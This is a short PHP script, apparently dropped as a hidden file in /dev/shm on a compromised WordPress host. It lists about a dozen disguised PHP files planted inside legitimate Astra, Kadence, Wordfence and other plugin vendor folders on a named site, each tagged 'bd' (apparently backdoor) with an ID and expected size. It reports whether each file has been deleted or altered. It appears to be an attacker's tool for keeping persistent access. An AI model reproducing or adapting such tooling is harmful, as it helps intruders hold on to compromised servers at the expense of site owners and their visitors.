File: //dev/shm/.ref
<?php $r = '/home/jourupex/levelupwellnesshub.com'; $x = ["/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Components/xmlrpcapi.php"=>"bd@@165909@@920",
"/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/dynamic-css/reminder_review.php"=>"bd@@165912@@862",
"/wp-content/themes/astra/inc/builder/type/base/dynamic-css/html/class.astra.html.component.dynamic.css.php"=>"bd@@165913@@912",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/export.php"=>"bd@@144995@@931",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/View/Exceptions/checklogin.php"=>"bd@@148354@@979",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/harbor/src/Harbor/API/Functions/Provider.Function.Registry.php"=>"bd@@166569@@950",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/licensing-api-client/src/Responses/License/Alias/functions_block.php"=>"bd@@166571@@931",
"/wp-content/plugins/reviews-feed/vendor/smashballoon/framework/Packages/php-di/src/Definition/Resolver/class.global.inc.php"=>"bd@@166572@@861",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Admin/Plugins.php"=>"bd@@166575@@997",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/harbor/src/Harbor/Admin/Feature.Manager.Page.php"=>"bd@@166576@@878",
"/wp-content/plugins/seo-1779185495/custom.file.5.1779185495.php"=>"bd@@129247@@846",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/monolog/monolog/src/Monolog/Attribute/multisite.php"=>"bd@@148456@@1038",
"/wp-content/themes/astra/inc/builder/type/header/woo-cart/dynamic-css/lrscan.php"=>"bd@@148463@@896"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');